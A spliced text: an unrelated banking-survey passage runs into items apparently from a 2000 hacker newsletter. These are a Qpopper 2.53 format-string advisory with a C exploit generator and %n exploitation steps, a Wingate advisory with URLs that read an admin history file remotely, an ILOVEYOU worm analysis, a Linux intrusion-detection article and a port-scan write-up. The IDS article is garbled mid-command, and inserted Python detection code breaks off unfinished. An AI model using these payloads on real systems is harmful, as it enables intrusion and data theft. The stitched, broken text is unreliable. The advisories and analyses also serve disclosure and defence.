Indeed, in some countries, such as Britain, they imply that the market expects banks’ profits to collapse in the next few years. Even the stockmarket seems to believe the dot.com wannabes, and rewards them with much richer valuations than boring old-economy banks. Still kicking And yet this survey will argue that many of the older institutions have a good story to tell. The “legacy systems” at which the upstarts scoff have one big virtue: they have tended, by and large, to work. Big banks process trillions of dollars a day. It is almost inconceivable that they might close down for a few hours because some clever Internet saboteur has found a way of snarling up their technology (as has recently happened to some of the biggest websites). Existing banks have customers in numbers that newcomers can only dream of, and even unpopular incumbents benefit from their customers’ inertia. The Internet also brings established firms huge opportunities as well as threats. To take two important examples, it offers ways of cutting costs and of marketing products much more efficiently. For years, in America, Europe, Japan and elsewhere, the industry has been consolidating: bank after bank has been taken over by or teamed up with an institution in a complementary line of business. Usually, these deals are justified to shareholders by the extra returns that can be generated once overlapping costs are stripped out. The Internet, potentially, offers a way of taking a knife to whole layers of costs. Once a customer is convinced to carry out most of his transactions online, his account becomes much cheaper to administer. The other much-cited benefit of consolidation is “cross-selling”—of insurance policies to bank-account holders, for example. Yet so far this has rarely been all that successful in practice. The Internet can be a precision-guided marketing tool. 
For example, if you apply online for a credit card from NextCard, an American Internet operation, you will be offered a choice of three charging structures. To qualify for the most favourable, you have to transfer a certain outstanding balance from your other credit cards. That sum will—fancy that!—be the actual total of your other balances, which NextCard has just ascertained online from the credit bureaus. Or, in wholesale finance, suppose you are a potential investor in a company’s initial public offering of shares, and have just finished watching the boss boosting his company’s prospects on Merrill Lynch’s online investment-banking service. The phone rings. And yes, it is a Merrill Lynch salesman who knows you have been watching, and thinks that now may be the moment to clinch a sale. But, for banks, each of these pluses comes with a minus. Because costs are so much lower for Internet-based transactions, the barriers to entry are lower as well, which implies that margins will come under pressure. And although the Internet makes well-directed sales pitches easier, that is hardly compensation for the precariousness of online customer relationships. Once your client is on the Internet, he is only a mouse-click away from your competitor, and more and more financial sites, search engines and portals will be pushing competing products at him. That, too, will squeeze margins. Viewed from this perspective, for many financial institutions the Internet is a double bind. Embrace it, and you may still find yourself losing business, or at least seeing profit margins dwindle. But ignoring it could be terminal. This survey will argue that the pressures for change have become irresistible. It concentrates on places where the process is most advanced—America and Europe—but the same lessons apply everywhere. Big financial institutions are global firms. And on the Internet, change spreads like wildfire. 
The stockmarket with the highest proportion of Internet trading is not, as you might think, in New York, but in Seoul. To make the challenge for the industry even more daunting, the revolution also encompasses the very architecture of many of the world’s biggest financial markets. Stock, commodity and futures exchanges, clearing and settlement systems are also being forced to consolidate and modernise, to prepare for the day when financial transactions are settled instantaneously. In public, no bank boss these days would admit to anything less than whole-hearted enthusiasm for the online adventure. In private, however, some still see it as just another distribution channel, perhaps less important than others, such as the telephone. A few still cling to the dream that it is a fad they have to indulge because their shareholders seem to like it. Even such non-believers, however, are being forced by the market to formulate an online strategy. If they are too slow, or get it wrong, the consequences for their firms could be deadly. And if they still need convincing, they need only look at what has happened, in just four years, to stockbroking.

http://www.qualisteam.com/eng/conf.shtml

@HWA

228.0 [b0f] Qpopper exploit code
      ~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.digibel.org/~b0f/advisors/b0f5-Qpopper.txt

_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 5

Advisory Name: Remote shell via Qpopper2.53
Date: 5/23/00
Application: Qpopper 2.53 for *NIX
Vendor: Qualcomm Incorporated
WWW: www.qualcomm.com
Severity: can give users remote shell with gid=mail.
Author: prizm (prizm@resentment.org)
Homepage: b0f.freebsd.lublin.pl

* Overview

Qpopper is the most widely-used server for the POP3 protocol. This allows users to access their mail using any POP3 client. Qpopper supports the latest standards, and includes a large number of optional features.
Qpopper is normally used with standard UNIX mail transfer and delivery agents such as sendmail or smail.

* The Problem

Yes, Qpop, again and again...

There is a bug in version 2.53 of Qpop that can give you a remote shell with gid=mail. Problem is with euidl command which uses user input as format string for pop_msg() function. Let's examine following code from Qpop 2.53 source:

--> pop_uidl.c, around line 150:

  ................
    sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
    if (nl = index(buffer, NEWLINE)) *nl = 0;
    sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));
  ! return (pop_msg (p,POP_SUCCESS, buffer));
                                    ^^^^^^^^^^^^^
  .................

Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat, const char *format,...), and here we have user-input as format string. Lame. Ok, back to problem, imagine following smtp session:

  MAIL FROM:
  200 Ok
  RCPT TO:
  200 Ok
  data
  200 Okey, okey. end with "."
  Subject: still trust qpop?=/
  X-UIDL: AAAAAAAAAAAAAAAA
  From: %p%p%p%p%p%p%p

  test
  .
  200 BLABLABLA Ok, message accepted for delivery.

Then, luser connects with his pop account and runs euidl command there:

  +OK QPOP (version 2.53) at b0f starting. <666.666@b0f>
  USER luser
  +OK Password required for luser.
  PASS secret
  +OK luser has 3 messages (1644 octets).
  euidl 3
  +OK 2 AAAAAAAAAAAAAAAA 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028

Yeah, that's from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p were implemented as arguments for vsnprintf() command.

* Exploiting

Is this possible? Yeah, sure! But there are some limits. Qpopper2.53 from FreeBSD ports with patches is much more difficult to exploit than one from linux. It is because freebsd patches change vsprintf() call in pop_msg.c to vsnprintf() call, and there is big difference between them. Qpopper with FreeBSD's patches IS exploitable.

Exploit
-------

/* qpop_euidl.c exploit by prizm/Buffer0verflow Security
 *
 * Sample exploit for buffer overflow in Qpopper 2.53.
 * This little proggie generates a mail u need to send.
 *
 * Standard disclaimer applies.
 * By the way, exploit is broken =) You need to insert shellcode.
 *
 * MAD greets to tf8 for pointing out the bug, and all other b0f members.
 * greets to USSRLabs and ADM
 * check http://b0f.freebsd.lublin.pl/ for news.
 */
#include <stdio.h>
#include <stdlib.h>

char shellcode[]="imnothing";

int main(int argc, char *argv[])
{
    int i;
    unsigned long ra=0;
    if(argc!=2) {
        fprintf(stderr,"Usage: %s return_addr\n", argv[0]);
        exit(0);
    }
    sscanf(argv[1], "%x", &ra);
    if(!ra)
        return 0;
    if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
        fprintf(stderr,"Bad shellcode\n");
        exit(0);
    }
    fprintf(stderr,"return address: 0x%.8x\n", ra);
    printf("X-UIDL: ");
    for(i=0; i < sizeof(shellcode);i++)
        printf("%c", shellcode[i]);
    printf("\r\n");
    printf("From: %s", "%.1000d");
    for(i=0; i < 50; i++)
        printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24);
    printf("@test\r\n");
    printf("Subject: test\r\n\r\nhuh?\r\n.\r\n");
    return 0;
}

Exploiting QPOP from FreeBSD ports
----------------------------------

It is NOT easy, because vsprintf() is replaced with vsnprintf() so we can't overflow stack, but we still have control over it (remember %n?). I'm not going to post exploit for this because it is really generic, but I will explain theory on exploiting qpop with vsNprintf. There is a little trick with %n you should know. Try to understand why following code succeeds and prints out 2000, not sizeof(b):

------
#include <stdio.h>

int main(void){
    int s=1;
    char b[1024];
    int q;
    snprintf(b, sizeof(b), "%.2000d%n", 1, &q);
    return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES"));
}
------

On my box with FreeBSD 3.4 i have:

  2000, overflowed? NO

Hah, first time i expected to see 1024, but you know that all is unpredictable. So, this little thing will help us a lot.

Exploiting it:

a) Find where in stack is located user input.
b) Compose a message with field X-UIDL and From:

   X-UIDL: ppRETARETARETARETA
   From: %.RETURNd%n@test

   where:
   "pp" is for padding (two or three chars)
   "RETA" is return address pointing to SHELLCODE
   "SHELLCODE" guess
   "RETURN" return address

c) Exploit? If you need an exploit that will work on FreeBSD, code it yourself.

* Vulnerable Versions

2.53(Others?)

* Fix

You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html#CURRENT which is not vulnerable to this problem. Or you can manually patch it by doing the following:

At lines 150 and 62 from pop_msg.c, replace:
- return (pop_msg (p,POP_SUCCESS, buffer));
to:
+ return (pop_msg (p,POP_SUCCESS, "%s", buffer));

copyright © 1999-2000 prizm, buffer0verfl0w security
b0f.freebsd.lublin.pl

@HWA

229.0 [b0f] Wingate advisory
      ~~~~~~~~~~~~~~~~~~~~~~

http://www.digibel.org/~b0f/advisors/b0f4-Wingate.txt

_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 4

Advisory Name: Wingate History database file reading
Date: 02/05/00
Application: Wingate 3.0.5
Vendor: Deerfield.com
WWW: www.deerfield.com
Severity: remote retrieval of history database file of the remote wingate server.
Author: axess ( axess@mail.com )
Homepage: www.b0f.com

* Overview

Wingate is a software for internet sharing and is very common.

* The Problem

First i want to add, WinGate versions prior to 2.1 allowed Internet access by default. But after that version they changed it. In WinGate 3.0 Home there are no way to change it so people can access it from the internet. In Wingate 3.0 Standard and Pro you can change this bindings. By researching this i have found out that many "in the wild" allow connections from the internet and this problem affect many. If not accessible from the internet they are always accessed from the LAN that has it.
So when connecting to the logfile server on port 8010 I found out that
all the files in the "root" directory of the installed software can be
read remotely. Nothing particularly interesting besides the Wingate's
administrator history file. It contains computer names, usernames and
the activity of the users that logged in. How this information can be
used you can figure out yourself. Besides that it's a matter of privacy
for the users using it that should be taken in mind.

So we just fire our browser away to

        http://server.com:8010/

Now we can just add the file we want to download, in this case

        http://server.com:8010/history.dbf

* Vulnerable Versions

I have tested the newest version 3.0.5 on NT4.0. But I'm pretty sure all
versions prior to it are vulnerable to the same problem.

* Fix

Close that stupid port that has always been a problem.

copyright © 1999-2000
buffer0verfl0w security
www.b0f.com

@HWA

230.0 [b0f] ILOVEYOU Virus analysis and removal
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.digibel.org/~b0f/lamagra/analysis.txt

Analysis of the LOVE-LETTER-FOR-YOU virus/worm
------------------------------------------------------------------------
The virus/worm hit Belgium and the rest of the world on Thursday
15/04/2000. A lot of important companies were struck including banks,
factories and my dad's work :). That's where I got the little bugger.
The virus/worm is a big vbscript that spreads by email (smells like
Melissa :)) and infects every script on your computer.

Lifecycle
------------------------------------------------------------------------
All starts by opening an attachment on an email, then the script starts.
It copies itself into:

        $windir/Win32DLL.vbs      ($windir = c:\windows on most windows systems)
        $systemdir/MSKernel32.vbs ($systemdir = c:\windows\system)
        $windir/LOVE-LETTER-FOR-YOU.TXT.vbs

Next it adds those files in the registry so they auto-start on boot.
After that it changes the default page of internet explorer, that way it
downloads an executable from a site when IE opens. If the file has
already been downloaded it also adds that into the registry and changes
the default page to "about:blank".

Then it starts sending emails with the script attached to all the people
in your addresslist.

Finally the big mess starts, the virus scans every harddisk and
networkdisk for extensions:

        Vbs, vbe, js, jse, css, wsh, sct, hta, vbs, jpg, jpeg

All files found are overwritten by the virus and when mp2's or mp3's are
found it copies itself to a vbs script in the same directory. And when
mIRC is found a small mIRC script is created which sends an html page,
which tries to infect you using IE, to every user that joins a channel
you're in.

executable
------------------------------------------------------------------------
It cracks the share passwords and sends those + ipaddr by email to the
creator of this virus (I couldn't get this program because the server
was shutdown, thanks to G0Dfarter for checking it)

Disinfection
------------------------------------------------------------------------
Open regedit and start deleting the malicious entries

        HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\Run\MSKernel32
        HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\RunServer\Win32DLL
        HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\Run\WIN_BUGSFIX

Search for WIN-BUGSFIX.exe and remove it.
Remove $dirsystem\LOVE-LETTER-FOR-YOU.HTM

Check files with extensions:

        Vbs, vbe, js, jse, css, wsh, sct, hta, vbs, jpg, jpeg

and check for infection, if so delete them (and replace them with the
original).

If you have mIRC installed, remove the script.ini file.

Remove all the emails, maybe warn the people in your addresslist so they
don't open the attachment.
Prevention
------------------------------------------------------------------------
There is only 1 rule in these cases: do NOT open suspicious files.

The number one cause why this virus is so effective is that in windows
everything is linked. You can control your entire computer from a simple
wordmacro (and worse). The best thing to do is turn off all sorts of
scripting in windows (if possible).

Lamagra
access-granted@geocities.com
http://lamagra.seKure.de

Member of b0f/buffer0verfl0w security
http://www.b0f.com

@HWA

231.0 [IND] Intrusion detection on Linux
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.securityfocus.com/focus/ids/articles/linux-ids.html

Intrusion Detection on Linux
by David "Del" Elson
last updated Monday, May 22, 2000

RedHat

Introduction

This article focuses on several host-based intrusion detection systems
that are available on Linux. In particular, I will cover some of the
basics of installing and setting up these packages, how they are useful,
and in what circumstances they can be used.

Systems Security 101

This article assumes a basic knowledge of systems security. In
particular, I will assume that the most basic security measures have
already been taken to secure a host against intrusion from the internet.
These measures could include:

  - Firewalling, to ensure that access to the various TCP and UDP ports
    of the system that were not intended for internet access is
    prevented. For example, a basic set of firewalling rules for a web
    server would ensure that the only TCP/IP access to the machine was
    on TCP port 80, the port normally used for HTTP access.

  - Disabling daemons that are not required. For example: A web server
    normally needs a process running to serve web pages. Processes that
    are not associated with serving web pages, such as RPC/Portmap
    services, NFS services, X Font Server, DNS name server, and other
    extraneous and unused applications should be stopped or disabled.
    On a Red Hat Linux system, this is normally done by using one of the
    run level editors, for example ntsysv or tksysv, to disable the
    startup of any daemon or service that is not required.

  - Disabling access to ports that are not required, by editing
    /etc/inetd.conf. Typically, a system will come pre-installed with
    access to many ports enabled in the /etc/inetd.conf file. Editing
    this file to remove or comment out any lines that are not required
    is the most basic system security activity and should be carried out
    on all systems.

Lines of Defence

[Illustration 1: Multi Layered Systems Security]

In this article, I will discuss a multi-layered approach to systems
security. Several security layers can be used independently to provide
additional protection in case any of the layers should be breached. An
example of a multi-layered security system is shown in illustration 1.

Each layer in the diagram provides additional data protection to the
layers above it. For example, the first layer is the firewall. Should an
intrusion attempt not be defeated by the firewall, a second layer, the
Port Sentry program, can provide additional protection.

Further inside the security system are the LIDS and LogCheck programs,
that provide additional protection should an intrusion attempt not be
intercepted by the Port Sentry program.

Monitoring Incoming Connections

The first layer of protection behind the firewall is a software package
that will monitor incoming attempts to connect to the machine. The
PortSentry package (http://www.psionic.com/abacus/portsentry/) provides
a simple and effective method of doing this.

What does PortSentry do?

PortSentry is a program that monitors activity on specific TCP/IP ports.
Activity on the ports that are monitored by PortSentry is reported, and
one of several options can be taken, including denying further attempts
to access your system from the source of the activity.
This is an important defence mechanism, because a hacker will typically
probe your system for weaknesses ("port scanning") before attempting an
intrusion. Detecting the probe or port scan, and completely denying
further access to your system by a potential hacker, robs that hacker of
the ability to follow up on any port scans with a real intrusion
attempt.

Installing PortSentry

For users of Red Hat Linux, PortSentry is available in RPM format on the
Red Hat contrib FTP site. This site is mirrored in various locations
around the world, check at www.redhat.com for the location of your
nearest mirror. I haven't yet determined the availability of a .deb
format package for PortSentry but I am sure there is one out there. For
other Linux systems, installing PortSentry from the source code is
relatively simple.

Recommended Configuration

PortSentry runs in a number of modes, including various TCP and UDP
stealth modes. The mechanism that I prefer to use for running PortSentry
is to bind it to a TCP port that (a) is not in use, and (b) is known in
some systems to have potential for intrusion attempts. For example, port
143 (imap2), port 111 (portmap) and port 23 (telnet) are TCP ports that
I do not use on my internet systems, and my web server was scanned on
both of those ports in the last 24 hours.

To start PortSentry in basic TCP mode, ensure that your system start-up
scripts run this command somewhere:

        portsentry -tcp

Also, ensure that the PortSentry config file (portsentry.conf) contains
a TCP_PORTS line enabling scanning on the ports that you require.

Response Options

The "Response Options" section of the portsentry.conf file allows you to
specify what response PortSentry will take on detecting unwanted
activity. The mechanism that I normally choose is to use ipchains to
block further access from the source of the activity.
This is done by uncommenting the following line in the portsentry.conf
file:

        KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"

On systems that receive a high level of port scanning activity, removing
the "-l" at the end of the above line will prevent logging of further
incoming connections, which might be useful to save space in the log
files.

Monitoring System Logs

Firewalling systems, and software like PortSentry, perform one useful
function, in that they monitor and prevent connections coming in to
unwanted ports on the system. This can prevent access to a system via a
standard scan-and-intrude method.

Where a system is required to run a particular service (eg: Apache on a
web server, or BIND on a DNS server), and a hacker has uncovered a
particular loophole in the service, these programs will unfortunately
not achieve the result of keeping all intruders out of the system. A
system acting as a DNS server that has a vulnerable copy of BIND running
on it will eventually be discovered by a hacker that scans a wide range
of machines for a single port (the DNS port) on each machine, and
attempts intrusion against that port only. The firewall and PortSentry
will unfortunately see this intrusion attempt as a legitimate access to
the system.

LogCheck

LogCheck (http://www.psionic.com/abacus/logcheck/) is a useful program
for scanning system logs for unusual activity. LogCheck works by
scanning the various system log files (under Linux these are located in
/var/log), and notifying the system administrator by e-mail if there is
any unusual activity. Unusual messages in the log files can often be
generated by intrusion attempts, or actual intrusions against your
system.

Installing LogCheck

LogCheck is available in RPM format from the Red Hat contrib archives,
and from the same sources as PortSentry. Installing LogCheck from the
RPM file or from the source code (read the INSTALL file provided with
the source code) is relatively simple.
Configuring LogCheck

LogCheck has four main configuration files. In the RPM version, these
are stored in the /etc/logcheck directory. Normally, only the
logcheck.ignore and the logcheck.violations.ignore files need
modification. The normal process that I go through after installing
LogCheck is as follows:

  - Allow LogCheck to run once with the standard configuration files.
    This will produce a large output file, which can be thrown away.

  - 24 hours later, allow LogCheck to run again. This will detect any
    new entries in the log files since the last run, and will produce a
    smaller but still sizeable output file. Read this file carefully.

  - For entries in the file that are of no great concern (use your
    judgement for this) find a specific identifying string in the entry.
    For entries that are in the "Security Violations" section, add the
    identifying string to the logcheck.violations.ignore file. For other
    entries (in the "Unusual System Events" section), add the string to
    the logcheck.ignore file.

  - Repeat this process, once every 12 - 24 hours for approximately a
    week. By this stage, enough "bogus" entries will be filtered out by
    the strings that you have added to the .ignore files that the daily
    LogCheck report will contain only genuine system concerns.

Note that the RPM file specifies that LogCheck is to be run hourly, but
normally I only run it daily except on critical systems that need
regular monitoring. This is done by moving the /etc/cron.hourly/logcheck
file into /etc/cron.daily.

Kernel Based Intrusion Detection

Kernel based intrusion detection is a relatively new art form for Linux.
The main kernel based intrusion detection system currently available is
called LIDS, and is available from http://www.lids.org/.

What is LIDS?

LIDS is an intrusion detection and prevention system that resides within
the Linux kernel. LIDS' protection is aimed at preventing the root user
(who would normally have access to the entire system) from tampering
with important parts of the system.
LIDS' most important features include increased file system protection,
protection against direct port access or direct memory access,
protection against raw disk access, and protection of log files. LIDS
also prevents certain system actions, such as installing a packet
sniffer or changing firewall rules.

LIDS Documentation

The LIDS system is somewhat more complex to install than either
PortSentry or LogCheck. Fortunately, the LIDS web site contains quite
good documentation on the LIDS project, including installation and
configuration instructions.

Installing LIDS

First, before installing LIDS, make sure that you have the most up to
date LIDS patch (I am using 0.9), and the correct kernel version. I am
using the updated kernel (2.2.14-12) from the Red Hat Updates FTP site,
because this contains some security fixes. You also need the source code
for the kernel that you are using.

LIDS is currently targeted towards the 2.2.14 kernels. I installed LIDS
on a Red Hat 6.2 system, this includes the 2.2.14 kernel. Before I
installed LIDS, I obtained the updated kernel (from
ftp.redhat.com/updates/ or one of its mirrors) and installed it
according to the instructions at
http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html.

The next thing I obtained was the updated kernel source, which also came
from ftp.redhat.com/updates/. This I installed using:

        rpm -Uhv kernel-source-2.2.14-12.i386.rpm

Next, compile and install the lidsadm program:

        cd /usr/local/src/security/lids-0.9/lidsadm-0.9
        make
        make install

Generate a RipeMD-160 password that will later be installed into the
kernel:

        lidsadm -P

I entered the password "anypass" and got back the key
"d502d92bfead11d1ef17887c9db07a78108859e8".

Next, I copied the standard Red Hat configuration file for my
architecture into the /usr/src/linux directory:

        cd /usr/src/linux/configs/
        cp kernel-2.2.12-i686.config ..
Next, I installed the LIDS patch using the following commands:

        cd /usr/src patch -p0 > /tmp/b mv /tmp/b /etc/inetd.conf killall -HUP inetd

Reading through this file, we can note the following activity:

  - A directory with an unusual name (/usr/lib/...) was created on the
    system. An FTP connection was made back to the hacker's personal
    machine (200.192.58.201, traced to a dial-in address somewhere in
    Brazil), and a simple hacker-kit was downloaded.

  - The hacker kit was uncompressed. It contained trojan binaries which
    were then installed on the system. The trojan binaries were used to
    over-write the system versions of netstat, ps, tcpd, syslogd, and
    pstree. These are programs that get used to report on system
    activity, show running processes, show open ports, etc.

  - A backdoor process of some kind (/usr/lib/pt07) was installed and
    started. Note that since the hacker has installed his or her own
    versions of ps, pstree, and netstat, this trojan is probably
    invisible to the system.

What Can We Learn From This?

Firstly, note that LIDS would not have prevented the actual break-in.
The hacker obtained root access to the machine by connecting to and
overflowing a buffer in a process that was running as root.

Once the hacker had broken in, we can note how LIDS would have minimised
the damage:

  - LIDS, by using the CAP_LINUX_IMMUTABLE option, would have prevented
    the trojan binaries from being written to /bin, /usr/bin, /usr/sbin,
    and /usr/lib. These are directories that we would normally mark as
    immutable (chattr +i) and hence could not have been changed. Note
    that even without LIDS we can mark these directories as immutable
    using chattr +i, but LIDS prevents even the root user from tampering
    with the immutable flag.

  - Similarly, the touch -t commands would have failed if the files were
    marked chattr +i.

  - Even the very first line of the script, "mkdir /usr/lib/..." would
    have failed if the /usr/lib directory was marked immutable!
Note that LIDS would not have prevented the break-in, but would have
prevented the hacker from causing any significant system damage after
the break-in. A backdoor process could have been installed (eg: the pt07
backdoor could have been placed in /tmp, or any other non-immutable
directory), but the non-trojan versions of ps, netstat, and pstree would
have detected this process fairly easily and we could have come back and
killed it off.

Without LIDS being installed we have no other real clues as to what the
hacker might have done via this backdoor, and so our only available
method to clean up the hacker's damage is to re-install the system
completely.

OpenWall and LIDS: An Extra Layer

Another similar system to LIDS is the OpenWall project
(http://www.openwall.com/linux/). The OpenWall project contains some
different security features to LIDS, and one of the OpenWall patches in
particular makes the stack area non-executable. An excerpt from the
OpenWall README file states:

    Most buffer overflow exploits are based on overwriting a function's
    return address on the stack to point to some arbitrary code, which
    is also put onto the stack. If the stack area is non-executable,
    buffer overflow vulnerabilities become harder to exploit.

    Another way to exploit a buffer overflow is to point the return
    address to a function in libc, usually system(). This patch also
    changes the default address that shared libraries are mmap()'ed at
    to make it always contain a zero byte. This makes it impossible to
    specify any more data (parameters to the function, or more copies of
    the return address when filling with a pattern), -- in many exploits
    that have to do with ASCIIZ strings.

Recently, the LIDS web site has contained some integrated LIDS +
OpenWall kernel patches that apply the security features of both LIDS
and OpenWall to the kernel in a single integrated patch set.
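
The break-in walk-through above names what the kit changed: the binaries netstat, ps, tcpd, syslogd and pstree were overwritten, timestamps were reset with touch -t, and a directory called "..." was created under /usr/lib. The following is an added example, not part of the original article or of LIDS, of a baseline check that catches those changes by content hash rather than by timestamp; the function names, the SHA-256 baseline and the constructed directory tree in demo() are assumptions made for illustration.

```python
import hashlib
import os
import tempfile

# Binaries the article says the kit replaced with trojaned versions.
WATCHED = ("netstat", "ps", "tcpd", "syslogd", "pstree")


def sha256_file(path):
    """Hash file contents; unlike mtime, this cannot be reset with touch -t."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def take_baseline(root):
    """Map relative path -> digest for every watched binary under root.

    Assumption: the result is stored off the host (or on read-only media),
    so an intruder with root cannot rewrite it.
    """
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name in WATCHED:
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = sha256_file(full)
    return baseline


def audit(root, baseline):
    """Return (kind, relative_path) findings for the tree under root."""
    findings = []
    for rel, digest in sorted(baseline.items()):
        full = os.path.join(root, rel)
        if not os.path.isfile(full):
            findings.append(("missing", rel))
        elif sha256_file(full) != digest:
            findings.append(("modified", rel))
    odd = []
    for dirpath, dirs, _files in os.walk(root):
        for name in dirs:
            # Names made only of dots and spaces ("...", ".. ") hide in ls output.
            if name.strip(". ") == "":
                odd.append(os.path.relpath(os.path.join(dirpath, name), root))
    findings.extend(("odd-directory", rel) for rel in sorted(odd))
    return findings


def demo():
    """Build a constructed tree, tamper with it as the article describes, audit it."""
    with tempfile.TemporaryDirectory() as root:
        for rel in ("bin/ps", "bin/netstat", "usr/lib/libexample.so"):
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(b"original " + rel.encode())
        baseline = take_baseline(root)

        ps_path = os.path.join(root, "bin", "ps")
        before = os.stat(ps_path)
        with open(ps_path, "wb") as fh:          # binary replaced
            fh.write(b"replaced ps")
        # Timestamps put back, which is the effect of the kit's touch -t.
        os.utime(ps_path, ns=(before.st_atime_ns, before.st_mtime_ns))
        os.mkdir(os.path.join(root, "usr", "lib", "..."))

        mtime_unchanged = os.stat(ps_path).st_mtime_ns == before.st_mtime_ns
        return audit(root, baseline), mtime_unchanged


if __name__ == "__main__":
    results, mtime_unchanged = demo()
    print("mtime unchanged after tampering:", mtime_unchanged)
    for kind, rel in results:
        print(kind, rel)
```

Run the audit with tools and a baseline that do not live on the audited host, since the article's point is that the host's own ps and netstat can no longer be trusted after a root compromise.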
Conclusions

Using a set of layered security tools on the Linux system, it is
possible to prevent a wide range of system attacks, and to protect your
system against intrusion or tampering. A hacker's point of entry into
your system will be the network interfaces, and protecting these, and
under the network interfaces, the system kernel, can discourage many
attacks and prevent others.

Be aware of any potential security holes in your system. Any daemon or
service running on your system, either as root or as a non-root user,
can be a potential security threat. Be prepared to face attacks against
these threats.

David Elson (Del) is a security and technology consultant working for
Wang New Zealand in Christchurch, on the South Island of New Zealand.
With 15 years IT experience, he consults to various clients on security
and networking issues. He also maintains a set of web pages on Linux and
other related security topics, and has given talks on various security
and networking issues at conferences in Australia and New Zealand.

@HWA

232.0 [IND] scan.txt Spitzner gets an unusual scan.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Recently my network received an unusual scan, deciphering it has proven
difficult. With some outstanding help from the security community, here
is my best guess at what the scan is.

THE SCAN
--------

On 20 May, one of my systems received a unique scan from three systems.
The three systems are:

        jive.rahul.net          (192.160.13.4)
        bug.rahul.net           (192.160.13.7)
        foxtrot.rahul.net       (192.160.13.6)

The scan signature is exactly the same from all three systems, they
scanned ports 1-1024 (see signature below). Of these three systems, one
is not active (jive.rahul.net) so we know for certain that at least one
system was spoofed. The other two systems (bug and foxtrot) are up. This
was confirmed both by hping and by the system owner, Rahul Dhesi.
However, I do not know if the two live systems were spoofed or not.
--- snort snort ---
05/20-17:06:45.061034 192.160.13.4:31337 -> 172.16.1.101:1
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400
.
.
.
05/20-17:06:58.685879 192.160.13.4:31337 -> 172.16.1.101:1024
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400
--- snip snip ---

THE TOOL
--------

These packets were crafted by a tool, they were not created by a
standard IP stack. We can determine this based on the following:

1. The Seq, Ack, and IP ID numbers are the same for all 1024 packets.
   An IP stack would have increasing numbers for all three.

2. Note the TCP flags, FIN, RST, and PSH. No standard IP stack would
   produce such a packet, nor would any IP stack respond with such a
   packet.

Many people commented that this was Back Orifice because of the 31337
port, but that is not the case. First, BO uses UDP by default. Also,
Dildog had this to say about the scan:

"A bo2k scanner would never come -from- port 31337. Something might scan
-you- for sockets listening on 31337, but not the other way around.
Regardless, this would have been BO, not BO2K, since BO2K doesn't have a
default port. This just looks like a regular port scan to me with a
fixed local port."

So, this scan was most likely done by a scanner that creates its own
packets, but which one?

Not nmap: Nmap does not have a FRP flag option. Nor does it use constant
Seq, Ack, and IP ID numbers.

Not hping: Hping can set most of the functionality of this scan, but it
CANNOT set the Seq or Ack number.

The best guess we have among the security community is these signatures
were created by Libnet, someone has created their own packets. Why
Libnet? To quote Simple Nomad (and Aaron Campbell):

"I thought these values looked familiar. Took me a bit, but check out
the sample programs that come with Libnet. In there you will find id
242, seq a1d95, ack 53, and a ttl of 48.
Looks like someone was playing around trying to write a scanner of sorts
using the Libnet sample progs as a starting point, and scanned you. So
check every machine 4 hops away...."

NOTE: I tried the traceroute 4 hops out, it was a router, most likely
not our suspect :(

So, based on what we know, our best guess is that Libnet was used to
create these packets.

PURPOSE OF THE SCAN
-------------------

This is the most confusing part, the TCP Flags FRP do not generate a
response, from open or closed ports. This has been tested on a variety
of systems by several people, including Max Vision, Dennis Ducamp, and
myself. So why run a scan when you won't get any results? I do not know.
Maybe someone was testing their coding or scanning skills. Perhaps they
were trying "man-in-the-middle" scan techniques. We may never know :(

K2 from ADM CREW has an interesting theory:

"Well, not really, what if you're not using the TCP/IP stack of the OS
but rather something like libpcap backdoor and are looking for weirdo
options ( this will enable you to communicate through onto a firewall'd
system )... he does use libnet to communicate with it so it leads me to
believe that he wants to have a sub-carrier connection that is not
normally valid. Source port significance is a really good way to
authenticate to a backdoor (ip independent), and can be detected by the
trojan early (able to bypass system logging). Exactly, libpcap based
backdoor with a libnet based client to pipe i/o to the backdoor... I
don't know why they would scan all the ports other than to assume that
the backdoor on the host may modulate the port it's listening on...
also, a system like this could listen on a port already allocated by the
system like even if telnetd is running... you can still contact your
backdoor on port 23 because your connect to that port is not valid to
anything that the system would have there (you're basically going up
your libpcap stack instead of the OS), this also helps get past any host
firewall."
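
The two indicators listed under THE TOOL above (identical Seq, Ack and IP ID on every packet, and FIN, RST and PSH set together), plus the fixed source port Dildog points out, can be checked mechanically. The following is an added example, not part of the original write-up, that parses Snort output in the layout shown under THE SCAN and reports those indicators per source address; the sample records are constructed (five ports instead of 1024, plus an ordinary client at 192.0.2.10 for contrast), and the function names and thresholds are assumptions.

```python
import re
from collections import defaultdict

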